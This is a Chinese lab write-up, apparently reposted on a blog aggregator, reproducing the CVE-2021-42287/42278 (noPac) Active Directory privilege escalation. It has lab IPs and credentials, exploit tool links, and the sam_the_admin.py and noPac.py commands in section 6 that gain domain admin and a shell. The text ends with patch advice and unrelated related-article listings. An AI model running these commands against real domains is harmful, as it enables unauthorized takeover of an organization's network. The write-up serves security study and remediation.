chaojixiaojingang
chaojixiaojingang

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)

1.漏洞描述

       Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。

2.影响版本

CVE-2021-42287:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

CVE-2021-42278:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core

3.漏洞利用条件

(1)一个普通域成员帐户

(2)域用户有创建机器用户的权限(一般默认权限)

(3)DC未打补丁KB5008380或KB5008602

4.环境准备

Win7

192.168.42.128

域普通用户:adtest/szg:1234qweR

Win server2008 R2 Standard Service Pack 1

192.168.42.136

域控机器

Kali

192.168.42.138

攻击机器

5.漏洞利用工具

下载地址:

https://github.com/WazeHell/sam-the-admin

https://github.com/Ridter/noPac

6.漏洞复现

sam-the-admin脚本

查看源码,发现脚本实际是实际就是调用两个可执行文件

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)_第1张图片

kali中存在这两个文件的py文件,路径为/usr/local/bin/smbexec.py 和 /usr/local/bin/secretsdump.py

修改代码如下:

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)_第2张图片

安装requirements.txt文件中的python模块

pip3 install -r requirements.txt

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)_第3张图片

执行如下命令进行域服务提权攻击

python3 sam_the_admin.py "adtest/szg:1234qweR" -dc-ip 192.168.42.136 -shell

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)_第4张图片

PS目前脚本只能在kali环境下运行成功。

noPac脚本

先安装requirements.txt文件中的模块

pip3 install -r requirements.txt

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)_第5张图片

Scanner

python3 scanner.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)_第6张图片

GetST

python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)_第7张图片

Auto get shell

python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136 –shell

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)_第8张图片

7.修复建议

官方已发布漏洞补丁及修复版本,Windows用户可通过Windows update自动更新升级,或通过下述漏洞参考中的链接手动更新。

漏洞参考:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278

你可能感兴趣的:(windows,安全,web安全)

  • 【前端】Electron入门开发教程,从介绍Electron到基础引用以及部分深度使用,附带常见的十个报错问题的解决方案和代码优化。 爱上大树的小猪 前端electronjavascript
    Electron是一个使用JavaScript、HTML和CSS等Web技术创建跨平台桌面应用程序的框架。它结合了Chromium渲染引擎和Node.js运行时,允许开发者构建高质量的桌面应用。下面是一个简要的Electron开发教程,从基础到深入,并包括一些常见的报错问题及其解决方案。一、介绍ElectronElectron能够使用前端技术栈开发桌面应用,支持Windows、macOS和Linu
  • 浏览器同源策略:从“源”到安全限制的全面解析 WebGISer_白茶乌龙桃 安全前端vue.jsjavascript
    一、什么是“源”(Origin)?在浏览器中,“源”是Web安全的核心概念。一个“源”由三部分组成:协议(Protocol):如http://、https://、ftp://域名(Host):如www.example.com端口(Port):如:80(HTTP默认)、:443(HTTPS默认)示例:https://www.example.com:443和https://www.example.co
  • PDF转换成word zhou_388 pdfwordpythonc语言c++phpjava
    #-*-coding:utf-8-*-#指定文件编码格式,支持中文#导入需要的标准库importos#操作系统接口模块,用于文件路径处理importthreading#多线程支持模块fromqueueimportQueue#线程安全队列,用于任务管理fromtkinterimportTk#GUI基础库fromtkinter.filedialogimportaskopenfilenames#文件选择
  • Github 2024-08-18 php开源项目日报 Top10 老孙正经胡说 githubphp开源Github趋势分析开源项目PythonGolang
    根据GithubTrendings的统计,今日(2024-08-18统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下:开发语言项目数量PHP项目10Shell项目1Blade项目1JavaScript项目1SecLists-安全测试人员的伴侣创建周期:4375天开发语言:PHP协议类型:MITLicenseStar数量:52010个Fork数量:23569次关注人数:52010人贡
  • python3.7.4怎么安装pycryptodome_python3.6 安装第三方库 pyCryptodome 实现AES加密 weixin_39799646
    起因前端日子写完的Python入库脚本,通过直接读取配置文件的内容(包含了数据库的ip,数据库的用户名,数据库的密码),因为配置文件中的数据库密码是明文显示的,所以不太安全,由此对其进行加密。编码之路编程环境Python3.6第三方库–pyCryptodome第三方库的介绍及下载1.在之前的AES加密中,python2或者3.4采用的是pyCyrpto这个模块,但是昨天废了好大劲去安装它都是失败,
  • 物联网的应用——智能家居篇 L5678Ling 物联网智能家居人工智能
    智能家居在物联网的应用主要体现在多个方面,这些应用不仅提升了家居生活的便利性和舒适度,还增强了家居的安全性和节能环保性。以下是智能家居在物联网中应用的详细分析:远程操控:用户可以通过手机APP、语音助手等方式,实现对家中各种智能设备的远程操控。例如,用户可以远程打开或关闭家中的灯光、空调、窗帘等设备,无需亲自到场操作。物联网技术使得这种远程操控变得实时、高效,极大地提升了家居生活的便捷性。一键场景
  • 告别数据泄露,美创科技数据库防水坝助力数据安全 科技热点快讯 安全
    数据安全建设中,“人”是最关键的因素,但也是最薄弱的环节和漏洞。近年来,“内鬼式数据泄露”、“数据库恶意篡改”、“删库跑路“等事件屡见不鲜,严峻程度逐年升高。Verizon《2021年数据泄露调查报告》统计,当前,85%的数据泄露事件都与人为因素有关。企业多年倾心竭力打造的“坚固堡垒”,正因为安全意识薄弱、内部默认可信任机制、数据安全措施落实不到位等“沉疴”,越来越像一枚“硬壳软糖”!内部数据安全
  • LibreOffice使用感受及兼容性问题 扎量丙不要犟 javac#c++
    LibreOffice是一款开源且免费的office程序,能用在Windows,GNU/Linux以及macOS等操作系统上。LibreOffice分为六个模块(我只试用了前三个)1、Writer文本文档:功能和word相似,默认保存格式为odt,同时也能保存为docX等。2、Calc电子表格:功能和excel类似,默认保存格式为ods,同时也能保存为xlsx等。3、Impress演示文稿:功能和
  • windows第八章 系统对话框 yerennuo windows基础windows
    文章目录文件选择对话框CFileDialogCFile文件操作CFolderPickerDialog字符集编码uincode编码ANSI字符和Unicode字符Windows中的Unicode函数C运行库中的Unicode函数Unicode与ANSI字符串转换颜色选择对话框CColorDialog字体选择对话框CFontDialog文件选择对话框CFileDialogvoidC对话框Dlg::On
  • Java基础入门-Day1 weixin_45795542 JAVAJAVA基础入门-Day1
    Java基础入门-Day1JAVA开发入门特点分类Java字节执行方式JDK的使用Java垃圾回收机制Java编译JAVA开发入门Java是一种高级计算机语言。他是由Sun公司(已被Oracle公司于2009年4月20日收购)于1995年5月推出的一种可以编写跨平台应用软件丶完全面向对象的程序设计语言。特点资源免费跨平台健壮,安全高性能简单面向对象动态性多线程分类Java针对不同的开发市场,Sun
  • C# 拖入文件 只能拖入txt文件 一念工作室 c#
    要实现只能将.txt文件拖入Button控件(如button1)并获取其路径,可以在之前的基础上添加文件类型的检查逻辑。以下是具体实现步骤和示例代码:1.创建WindowsForms项目打开VisualStudio,创建一个新的WindowsForms应用程序项目。2.设计界面在窗体上添加一个Button控件,将其命名为button1。3.编写代码usingSystem;usingSystem.I
  • WPF开发技巧:在WPF的DataGrid中实现动态增加列并刷新表格 Singe.Chen #WPFwpf
    1.VM代码usingPrism.Mvvm;usingSystem;usingSystem.Collections.Generic;usingSystem.Collections.ObjectModel;usingSystem.Linq;usingSystem.Text;usingSystem.Threading.Tasks;usingSystem.Windows.Input;usingNewto
  • android 软键盘的显示和隐藏方法 飞_哥 android软键盘隐藏显示android
    方法一:在OnCreate()函数中,加上下面的代码getWindow().setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_HIDDEN);12方法二:在AndroidManifest.xml中,在所要设置的activity中设置以下属性就行了activityandroid:windowSoftInputMode="stat
  • 点击屏幕隐藏软键盘、软键盘显示/隐藏、windowSoftInputMode常用属性说明(禁止软键盘自动弹出、键盘遮挡问题) Mr_Leixiansheng androidui
    转载请注明出处:点击屏幕隐藏软键盘、软键盘显示/隐藏、windowSoftInputMode常用属性说明(禁止软键盘自动弹出、键盘遮挡问题)_当软键盘显示时更多面板应该隐藏_Mr_Leixiansheng的博客-CSDN博客点击屏幕隐藏软键盘1,实现方法一:通过给当前界面布局文件的父layout设置点击事件(相当于给整个Activity设置点击事件),在事件里进行键盘隐藏加上id和clickabl
  • Linux 上 MySQL 8.0 的备份与恢复实战指南 云水一方 mysqllinux大数据数据仓库运维数据库
    在数据库运维过程中,备份与恢复是保障数据安全的重要手段。MySQL8.0在Linux环境中提供了多种备份和恢复方案,包括逻辑备份和物理备份。本文将介绍这些备份方式的操作步骤与逻辑实现,帮助您高效管理数据库。一、备份与恢复的作用和意义数据安全:防止因误操作、硬件故障或恶意攻击导致的数据丢失。容灾恢复:在灾难发生后快速恢复业务功能,减少停机时间。数据迁移:支持数据库迁移至新环境或硬件。二、备份方式概览
  • windows进阶-cmd命令 云水一方 运维windowsc语言
    在Windows操作系统中,CMD提供了许多强大的命令,能够帮助用户执行一些更为高级的任务。这些命令不仅仅限于文件和目录的管理,还包括了服务管理、远程连接、注册表操作等功能。本文将介绍一些常见但较为特殊的CMD命令及其功能,帮助你更好地使用Windows命令行。1.sc–服务管理sc命令用于与Windows服务交互,可以启动、停止、配置或查询系统服务。这是一个功能强大的工具,尤其在进行系统管理时非
  • java 字节文件类型_Java根据字节数据判断文件类型 weixin_39795284 java字节文件类型
    通常,在WEB系统中,上传文件时都需要做文件的类型校验,大致有如下几种方法:1.通过后缀名,如exe,jpg,bmp,rar,zip等等。2.通过读取文件,获取文件的Content-type来判断。3.通过读取文件流,根据文件流中特定的一些字节标识来区分不同类型的文件。4.若是图片,则通过缩放来判断,可以缩放的为图片,不可以的则不是。然而,在安全性较高的业务场景中,1,2两种方法的校验会被轻易绕过
  • Debezium Configuration 设计文档 DataLu Debezium设计Debezium数据库debezium数据变更数据迁移
    DebeziumConfiguration设计文档1.核心设计理念1.1不可变配置配置对象一旦创建就不能修改所有修改操作都会返回新的配置对象通过不可变性保证线程安全使用@Immutable注解标记1.2组件化设计Configuration接口:定义配置的核心APIField类:描述配置字段的元数据和验证规则CommonConnectorConfig:所有连接器共享的基础配置EmbeddedConf
  • java development kit - 11 - jdk下载安装、环境变量设置 「已注销」 java
    目录JavaSE(StandardEdition,标准版)-11jdk下载jdk-11.0.6_windows安装设置环境变量JavaSE(StandardEdition,标准版)-11jdk下载如果懒得去官网下载可以直接在下面这个下载,然后跳过这一步,这个链接提供的是jdk11.0.6的Windows版本。官网其实也很坑,下载页面有时显示不出来,然后下载可能要注册登录。百度云--jdk-11.0
  • 探索Java新境界:JDK 15.0.1 Windows 64位安装与环境配置指南 房莺耘
    探索Java新境界:JDK15.0.1Windows64位安装与环境配置指南【下载地址】JDK15.0.1Windows64位安装与环境配置指南分享JDK15.0.1Windows64位安装与环境配置指南欢迎使用JDK15.0.1,这是Oracle在2020年发布的Java开发套件的一个更新版本项目地址:https://gitcode.com/Resource-Bundle-Collection/
  • 2025年:网络安全犯罪活动发展新趋势 网安加社区 网络安全网络风险网络犯罪
    2024年,网络空间经历了一场前所未有的动荡,威胁行为者的活动频繁且多变,这一系列事件为2025年的网络安全形势蒙上了一层阴影,预示着挑战依旧严峻。为了深入了解并有效应对勒索软件及其他网络犯罪活动的新趋势,我们与业界领先的安全专家进行了交流探讨,以期帮助企业组织全面认知可能面临的风险,并据此制定出切实有效的防御策略。勒索软件生态系统的持续扩张勒索软件生态系统正以前所未有的速度发展,不断适应并规避防
  • 2025年企业网络安全:风险预测与应对策略 网安加社区 网络安全网络风险企业安全
    据预测,到2025年,网络犯罪可能给全球经济带来每年高达10.5万亿美元的损失。这一个惊人的数字,为各行各业敲响了警钟。随着网络威胁日益复杂多变,企业要保持领先地位,就必须时刻保持警惕,勇于创新,采取积极主动的防御策略。那么,2025年的企业网络安全领域将面临哪些挑战?企业又该如何做好准备?接下来,我们一同深入探讨企业网络安全的发展趋势与应对策略。2025年企业网络安全风险如今,企业的网络安全已不
  • Oracle11g下载与安装(windows) pingcode JAVA全栈开发笔记(全)JAVA前后端开发笔记oracle
    一、Oracle11g下载官网下载地址:OracleDatabase11gRelease2forMicrosoftWindows(x64)选择"AcceptLicenseAgreement",点击"win64_11gR2_database_1of2.zip"和"win64_11gR2_database_2of2.zip",进行下载。(下载前需登录Oracle账号,没有的话可以用邮箱注册一个,登录之
  • 【Java】通俗易懂方法引用 麻辣香蝈蝈 Javajavapython开发语言springboot学习方法mybatis
    Java系列文章目录补充内容Windows通过SSH连接Linux第一章Linux基本命令的学习与Linux历史文章目录Java系列文章目录一、前言二、学习内容:三、问题描述四、解决方案:4.1解释4.2使用场景4.3为何使用Lambda表达式五、总结:5.1方法引用主要有四种类型:5.2方法引用的好处一、前言方法引用学习与见方法引用理解一下wrapper.set(request.getName(
  • 【Docker】搭建 Docker 私有化仓库 cangloe dockerdocker容器运维
    搭建Docker私有化仓库是一个非常重要的实践,它能够帮助你安全地存储和管理Docker镜像,而无需将其发布到公共DockerHub。通过使用私有化仓库,你可以:提高安全性:镜像存储在受控的环境中。提升效率:在公司网络内传输镜像,速度更快。实现自动化:配合CI/CD系统实现自动镜像管理。本文将详细介绍如何在不同环境下搭建Docker私有化仓库,并提供配置和优化建议。一、Docker私有化仓库的基本
  • Java 阻塞队列(BlockingQueue)实战与原理详解 吴冰_hogan jucjava网络协议网络
    引言在多线程编程中,BlockingQueue是一种非常有用的同步工具,它不仅提供了线程安全的队列访问方式,还能够自动处理生产者和消费者之间的阻塞行为。本文将基于提供的文档内容,深入探讨BlockingQueue的工作原理及其在实际应用中的使用方法,并详细介绍几种常见的BlockingQueue实现。一、阻塞队列基础1.1定义与特性BlockingQueue是一个接口,定义了支持阻塞插入和移除操作
  • 使用Docker和Nginx轻松配置Let's Encrypt免费SSL证书 侯深业Dorian
    使用Docker和Nginx轻松配置Let'sEncrypt免费SSL证书去发现同类优质开源项目:https://gitcode.com/在数字化的今天,网站的安全性已成为每个在线业务的基础。Let'sEncrypt提供了免费的SSL证书,使得网站能够启用HTTPS,确保数据传输的安全。这篇项目文章将引导你通过Docker和Nginx,轻松实现Let'sEncryptSSL证书的自动配置。1、项目
  • 【Docker】【Nacos】单机部署 又言又语 Dockerdockernacos单机模式
    【Docker】【Nacos】单机部署背景介绍环境步骤总结背景因国内访问DockerHub极不稳定,因此总结整理出本文,以便后续需要时方便查看。介绍本文介绍Docker安装Nacos并实现单机模式部署的方法及步骤。环境分类名称版本操作系统WindowsWindows11DockerDockerEngine25.0.3DockerDockerClient25.0.3DockerDockerDeskt
  • 网络安全攻防实战:从基础防护到高级对抗 一ge科研小菜鸡 运维网络
    个人主页:一ge科研小菜鸡-CSDN博客期待您的关注引言在信息化时代,网络安全已经成为企业、政府和个人必须重视的问题。从数据泄露到勒索软件攻击,每一次安全漏洞都可能造成巨大的经济损失和隐私风险。本教程将通过详细的案例、代码示例和实用工具,帮助读者从基础安全防护到高级安全对抗,系统掌握网络安全攻防的核心技术。1.常见网络攻击方式与防御措施1.1SQL注入攻击攻击者在输入字段中插入恶意SQL代码,绕过
  • 谈谈信息安全治理模型 SOA开发者 安全web安全网络
    当我们学习ISO/SAE21434标准的时候,会看到网络安全治理(Cybersecuritygovernment)和网络安全管理(Cybersecuritymanagement)两个概念。然而该标准中并没有给出安全治理和安全管理的十分清晰的定义和描述。即使在安全社区内,似乎也是讲安全管理的多,讲安全治理的少。那到底两个概念是什么?两者的区别和联系又是什么呢?笔者通过调研发现安全治理、安全管理和安全
  • 二分查找排序算法 周凡杨 java二分查找排序算法折半
    一:概念 二分查找又称 折半查找( 折半搜索/ 二分搜索),优点是比较次数少,查找速度快,平均性能好;其缺点是要求待查表为有序表,且插入删除困难。因此,折半查找方法适用于不经常变动而 查找频繁的有序列表。首先,假设表中元素是按升序排列,将表中间位置记录的关键字与查找关键字比较,如果两者相等,则查找成功;否则利用中间位置记录将表 分成前、后两个子表,如果中间位置记录的关键字大于查找关键字,则进一步
  • java中的BigDecimal bijian1013 javaBigDecimal
            在项目开发过程中出现精度丢失问题,查资料用BigDecimal解决,并发现如下这篇BigDecimal的解决问题的思路和方法很值得学习,特转载。         原文地址:http://blog.csdn.net/ugg/article/de
  • Shell echo命令详解 daizj echoshell
    Shell echo命令 Shell 的 echo 指令与 PHP 的 echo 指令类似,都是用于字符串的输出。命令格式: echo string 您可以使用echo实现更复杂的输出格式控制。 1.显示普通字符串: echo "It is a test" 这里的双引号完全可以省略,以下命令与上面实例效果一致: echo Itis a test 2.显示转义
  • Oracle DBA 简单操作 周凡杨 oracle dba sql
    --执行次数多的SQL select sql_text,executions from (      select sql_text,executions from v$sqlarea order by executions desc      ) where rownum<81;  &nb
  • 画图重绘 朱辉辉33 游戏
      我第一次接触重绘是编写五子棋小游戏的时候,因为游戏里的棋盘是用线绘制的,而这些东西并不在系统自带的重绘里,所以在移动窗体时,棋盘并不会重绘出来。所以我们要重写系统的重绘方法。   在重写系统重绘方法时,我们要注意一定要调用父类的重绘方法,即加上super.paint(g),因为如果不调用父类的重绘方式,重写后会把父类的重绘覆盖掉,而父类的重绘方法是绘制画布,这样就导致我们
  • 线程之初体验 西蜀石兰 线程
    一直觉得多线程是学Java的一个分水岭,懂多线程才算入门。 之前看《编程思想》的多线程章节,看的云里雾里,知道线程类有哪几个方法,却依旧不知道线程到底是什么?书上都写线程是进程的模块,共享线程的资源,可是这跟多线程编程有毛线的关系,呜呜。。。 线程其实也是用户自定义的任务,不要过多的强调线程的属性,而忽略了线程最基本的属性。 你可以在线程类的run()方法中定义自己的任务,就跟正常的Ja
  • linux集群互相免登陆配置 林鹤霄 linux
    配置ssh免登陆 1、生成秘钥和公钥    ssh-keygen -t rsa 2、提示让你输入,什么都不输,三次回车之后会在~下面的.ssh文件夹中多出两个文件id_rsa 和 id_rsa.pub    其中id_rsa为秘钥,id_rsa.pub为公钥,使用公钥加密的数据只有私钥才能对这些数据解密    c
  • mysql : Lock wait timeout exceeded; try restarting transaction aigo mysql
    原文:http://www.cnblogs.com/freeliver54/archive/2010/09/30/1839042.html   原因是你使用的InnoDB   表类型的时候, 默认参数:innodb_lock_wait_timeout设置锁等待的时间是50s, 因为有的锁等待超过了这个时间,所以抱错.   你可以把这个时间加长,或者优化存储
  • Socket编程 基本的聊天实现。 alleni123 socket
    public class Server { //用来存储所有连接上来的客户 private List<ServerThread> clients; public static void main(String[] args) { Server s = new Server(); s.startServer(9988); } publi
  • 多线程监听器事件模式(一个简单的例子) 百合不是茶 线程监听模式
        多线程的事件监听器模式   监听器时间模式经常与多线程使用,在多线程中如何知道我的线程正在执行那什么内容,可以通过时间监听器模式得到        创建多线程的事件监听器模式 思路:    1, 创建线程并启动,在创建线程的位置设置一个标记     2,创建队
  • spring InitializingBean接口 bijian1013 javaspring
    spring的事务的TransactionTemplate,其源码如下: public class TransactionTemplate extends DefaultTransactionDefinition implements TransactionOperations, InitializingBean{ ... } TransactionTemplate继承了DefaultT
  • Oracle中询表的权限被授予给了哪些用户 bijian1013 oracle数据库权限
            Oracle查询表将权限赋给了哪些用户的SQL,以备查用。 select t.table_name as "表名", t.grantee as "被授权的属组", t.owner as "对象所在的属组"
  • 【Struts2五】Struts2 参数传值 bit1129 struts2
    Struts2中参数传值的3种情况 1.请求参数绑定到Action的实例字段上 2.Action将值传递到转发的视图上 3.Action将值传递到重定向的视图上   一、请求参数绑定到Action的实例字段上以及Action将值传递到转发的视图上 Struts可以自动将请求URL中的请求参数或者表单提交的参数绑定到Action定义的实例字段上,绑定的规则使用ognl表达式语言
  • 【Kafka十四】关于auto.offset.reset[Q/A] bit1129 kafka
    I got serveral questions about  auto.offset.reset. This configuration parameter governs how  consumer read the message from  Kafka when  there is no initial offset in ZooKeeper or
  • nginx gzip压缩配置 ronin47 nginx gzip 压缩范例
    nginx gzip压缩配置 更多 0 nginx gzip 配置   随着nginx的发展,越来越多的网站使用nginx,因此nginx的优化变得越来越重要,今天我们来看看nginx的gzip压缩到底是怎么压缩的呢? gzip(GNU-ZIP)是一种压缩技术。经过gzip压缩后页面大小可以变为原来的30%甚至更小,这样,用
  • java-13.输入一个单向链表,输出该链表中倒数第 k 个节点 bylijinnan java
    two cursors. Make the first cursor go K steps first. /* * 第 13 题:题目:输入一个单向链表,输出该链表中倒数第 k 个节点 */ public void displayKthItemsBackWard(ListNode head,int k){ ListNode p1=head,p2=head;
  • Spring源码学习-JdbcTemplate queryForObject bylijinnan javaspring
    JdbcTemplate中有两个可能会混淆的queryForObject方法: 1. Object queryForObject(String sql, Object[] args, Class requiredType) 2. Object queryForObject(String sql, Object[] args, RowMapper rowMapper) 第1个方法是只查
  • [冰川时代]在冰川时代,我们需要什么样的技术? comsci 技术
         看美国那边的气候情况....我有个感觉...是不是要进入小冰期了?      那么在小冰期里面...我们的户外活动肯定会出现很多问题...在室内呆着的情况会非常多...怎么在室内呆着而不发闷...怎么用最低的电力保证室内的温度.....这都需要技术手段...   &nb
  • js 获取浏览器型号 cuityang js浏览器
    根据浏览器获取iphone和apk的下载地址 <!DOCTYPE html> <html> <head>     <meta charset="utf-8" content="text/html"/>     <meta name=
  • C# socks5详解 转 dalan_123 socketC#
    http://www.cnblogs.com/zhujiechang/archive/2008/10/21/1316308.html  这里主要讲的是用.NET实现基于Socket5下面的代理协议进行客户端的通讯,Socket4的实现是类似的,注意的事,这里不是讲用C#实现一个代理服务器,因为实现一个代理服务器需要实现很多协议,头大,而且现在市面上有很多现成的代理服务器用,性能又好,
  • 运维 Centos问题汇总 dcj3sjt126com 云主机
    一、sh 脚本不执行的原因 sh脚本不执行的原因 只有2个 1.权限不够 2.sh脚本里路径没写完整。   二、解决You have new mail in /var/spool/mail/root 修改/usr/share/logwatch/default.conf/logwatch.conf配置文件 MailTo = MailFrom   三、查询连接数
  • Yii防注入攻击笔记 dcj3sjt126com sqlWEB安全yii
    网站表单有注入漏洞须对所有用户输入的内容进行个过滤和检查,可以使用正则表达式或者直接输入字符判断,大部分是只允许输入字母和数字的,其它字符度不允许;对于内容复杂表单的内容,应该对html和script的符号进行转义替换:尤其是<,>,',"",&这几个符号 这里有个转义对照表: http://blog.csdn.net/xinzhu1990/articl
  • MongoDB简介[一] eksliang mongodbMongoDB简介
    MongoDB简介 转载请出自出处:http://eksliang.iteye.com/blog/2173288 1.1易于使用        MongoDB是一个面向文档的数据库,而不是关系型数据库。与关系型数据库相比,面向文档的数据库不再有行的概念,取而代之的是更为灵活的“文档”模型。        另外,不
  • zookeeper windows 入门安装和测试 greemranqq zookeeper安装分布式
    一、序言       以下是我对zookeeper 的一些理解:      zookeeper 作为一个服务注册信息存储的管理工具,好吧,这样说得很抽象,我们举个“栗子”。       栗子1号:       假设我是一家KTV的老板,我同时拥有5家KTV,我肯定得时刻监视
  • Spring之使用事务缘由(2-注解实现) ihuning spring
      Spring事务注解实现   1. 依赖包:     1.1 spring包:           spring-beans-4.0.0.RELEASE.jar           spring-context-4.0.0.
  • iOS App Launch Option 啸笑天 option
    iOS 程序启动时总会调用application:didFinishLaunchingWithOptions:,其中第二个参数launchOptions为NSDictionary类型的对象,里面存储有此程序启动的原因。   launchOptions中的可能键值见UIApplication Class Reference的Launch Options Keys节 。 1、若用户直接
  • jdk与jre的区别(_) macroli javajvmjdk
    简单的说JDK是面向开发人员使用的SDK,它提供了Java的开发环境和运行环境。SDK是Software Development Kit 一般指软件开发包,可以包括函数库、编译程序等。  JDK就是Java Development Kit JRE是Java Runtime Enviroment是指Java的运行环境,是面向Java程序的使用者,而不是开发者。 如果安装了JDK,会发同你
  • Updates were rejected because the tip of your current branch is behind qiaolevip 学习永无止境每天进步一点点众观千象git
    $ git push joe prod-2295-1 To [email protected]:joe.le/dr-frontend.git ! [rejected] prod-2295-1 -> prod-2295-1 (non-fast-forward) error: failed to push some refs to '[email protected]
  • [一起学Hive]之十四-Hive的元数据表结构详解 superlxw1234 hivehive元数据结构
    关键字:Hive元数据、Hive元数据表结构   之前在 “[一起学Hive]之一–Hive概述,Hive是什么”中介绍过,Hive自己维护了一套元数据,用户通过HQL查询时候,Hive首先需要结合元数据,将HQL翻译成MapReduce去执行。 本文介绍一下Hive元数据中重要的一些表结构及用途,以Hive0.13为例。   文章最后面,会以一个示例来全面了解一下,
  • Spring 3.2.14,4.1.7,4.2.RC2发布 wiselyman Spring 3
      Spring 3.2.14、4.1.7及4.2.RC2于6月30日发布。   其中Spring 3.2.1是一个维护版本(维护周期到2016-12-31截止),后续会继续根据需求和bug发布维护版本。此时,Spring官方强烈建议升级Spring框架至4.1.7 或者将要发布的4.2 。   其中Spring 4.1.7主要包含这些更新内容。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他